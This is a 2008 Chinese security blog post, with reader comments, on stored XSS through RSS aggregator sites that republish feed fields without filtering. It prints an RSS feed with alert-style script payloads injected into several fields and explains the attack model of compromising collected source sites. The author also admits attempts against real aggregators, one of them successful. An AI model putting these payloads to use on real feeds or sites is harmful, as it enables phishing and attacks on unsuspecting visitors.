聚合采集器XSS攻击

by kxlzx

聚合采集器是个采集网站新闻,blog文章RSS的工具。
WEB2.0后,很多网站提供了RSS搜集功能。
之后,就有很多采集RSS的工具出现,著名的有很多“周博通采集器,GOOGLE采集器等”。
采集器通过对这些站点的RSS页面轮训,获得页面中某些固定数据。

XML/HTML代码
  1. <?xml version="1.0" encoding="utf-8"?>  
  2. <rss version="2.0">  
  3.     <channel>  
  4.         <title>空虚浪子心的灵魂</title>  
  5.         <link>http://www.inbreak.net/</link>  
  6.         <description>linux学习中</description>  
  7.         <copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>  
  8.         <generator>SaBlog-X Version 1.6 Build 20080806</generator>  
  9.   
  10.         <lastBuildDate>Wed,  3 Sep 2008 15:57:37 +0000</lastBuildDate>  
  11.         <ttl>30</ttl>  
  12.         <item>  
  13.             <guid>http://www.inbreak.net/?action=show&id=126</guid>  
  14.             <title>《突破IE安全限制获取iframe子框架内的本地cookie》文的另一POC</title>  
  15.             <author>空虚浪子心</author>  
  16.   
  17.             <description><![CDATA[<p>刺在<br /> 
  18. http://hi.baidu.com/aullik5/blog/item/a41642357663b248251f141e.html<br /> 
  19. 的文章:<br /> 
  20. 《突破IE安全限制获取iframe子框架内的本地cookie》<br /> 
  21. 的另一POC。</p><br /><br /><a href="http://www.inbreak.net/?action=show&id=126" target="_blank">阅读全文</a><br /><br />]]></description>  
  22.             <link>http://www.inbreak.net/?action=show&id=126</link>  
  23.             <category domain="http://www.inbreak.net/?cid=5">原创文章</category>  
  24.             <pubDate>2008-09-01 17:33</pubDate>  
  25.         </item>  
  26.     </channel>  
  27. </rss>  

这是一个常见的RSS格式。
采集器的作用是搜集其中重要的字段内容,例如:“title”,“description”等。
但是有些采集器没有对其中内容进行过滤。

很久之前,“周博通”采集器就出现过一个漏洞。详见:
http://www.inbreak.net/?action=show&id=62

而现在大家都倾向于做RSS采集站,这样的采集站,通过做SEO,再加上自己的数据来源足够,能够大量的被搜索引擎收入。

既然要做成网站,必然有个把采集到的内容转换成HTML的过程。

在转换过程中,很多采集器都没有对搜录进来的内容过滤。

导致一个新的攻击手段出现。

由于采集站的PV大都来自搜索引擎,所以不失为一个极佳钓鱼场所。

当你发现一个采集站采集了很多时,你可以尝试入侵其中一个已搜录的站点。

攻击手段很简单,修改它的RSS数据。将提到的字段加入XSS攻击。

例如:

 

XML/HTML代码
  1.  1.  <?xml version="1.0" encoding="utf-8"?>    
  2.  2. <rss version="2.0">    
  3.  3.     <channel>    
  4.  4.         <title>空虚浪子心的灵魂</title>    
  5.  5.         <link>http://www.inbreak.net/</link>    
  6.  6.         <description>linux学习中</description>    
  7.  7.         <copyright>Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.</copyright>    
  8.  8.         <generator>SaBlog-X Version 1.6 Build 20080806</generator>    
  9.  9.     
  10. 10.         <lastBuildDate>Wed,  3 Sep 2008 15:57:37 +0000</lastBuildDate>    
  11. 11.         <ttl>30</ttl>    
  12. 12.         <item>    
  13. 13.             <guid>http://www.inbreak.net/?action=show&id=126</guid>    
  14. 14.             <title><script>alert(‘hackedbykxlzx’);</script></title>    
  15. 15.             <author><script>alert(‘hackedbykxlzx’);</script></author>    
  16. 16.     
  17. 17.             <description><![CDATA[<script>alert(‘hackedbykxlzx’);</script>]]><script>alert(‘hackedbykxlzx’);</script></description>    
  18. 22.             <link>http://www.inbreak.net/?action=show&id=126</link>    
  19. 23.             <category domain="http://www.inbreak.net/?cid=5"><script>alert(‘hackedbykxlzx’);</script></category>    
  20. 24.             <pubDate>2008-09-01 17:33</pubDate>    
  21. 25.         </item>    
  22. 26.     </channel>    
  23. 27. </rss>    

 

可攻击面很大,容易出现漏洞。

之前一段时间,我看到鬼仔的站huandan.org被某著名安全组织采集站搜集,之后联系鬼子,威逼利诱他修改自己的RSS。

最终XSS成功。。。

不过今天貌似对刺的采集器planet.ph4nt0m.org攻击没成功。。。嗯。。。不甘心啊。。。再找找漏洞,兴许还有什么没过滤。(纠正下,这里的采集器不是刺写的,是云舒写的,呵呵,不好意思,我看到幻影的,以为是刺)

攻击模式:
1,攻击某采集器所采集的站。而不是直接攻击采集器的站。保证在采集器站上不会留下攻击日志。
2,攻击需要等采集器轮询过来之后,才能有看到效果。这不同于平时的攻击,立刻就有结果。
3,对于采集器来说,攻击来自客户网站,是网站对网站的攻击。而不是客户端直接对网站的攻击。

而上N点。。。也不能说明这是个新技术。。。。
只是提到一个攻击层面而已。就像对AJAX的攻击。也不是一项新技术

发表评论?

11 条评论。

  1. 我做了过滤的,哪那么容易。

  2. BTW,那个不是刺写的。

  3. 呵呵,对所有外部来源统统过滤,不是所有的人都能想到的。

  4. 老技术了,虽然还有些聚合没有过滤,但已经不会形成趋势了,

  5. 重点在于有没有过滤 so 这不是新技术

  6. 我认为,这种攻击,在于利用的手段。

    攻击模式:
    1,攻击某采集器所采集的站。而不是直接攻击采集器的站。保证在采集器站上不会留下攻击日志。
    2,攻击需要等采集器轮询过来之后,才能有看到效果。这不同于平时的攻击,立刻就有结果。
    3,对于采集器来说,攻击来自客户网站,是网站对网站的攻击。而不是客户端直接对网站的攻击。

    而上N点。。。也不能说明这是个新技术。。。。
    只是提到一个攻击层面而已。就像对AJAX的攻击。也不是一项新技术啊。

  7. 测试个jb 要测试自己去搞个环境测试 但云舒blog上下个程序测试 nnd 测试那么多 还让不让别人看了

  8. hoho!!
    被过滤掉了~~~

  9. 翻一翻刺的老文章,分析IE8 BETA2安全特性的一个新的安全函数。

  10. 技术非常老套,鉴定完毕

发表评论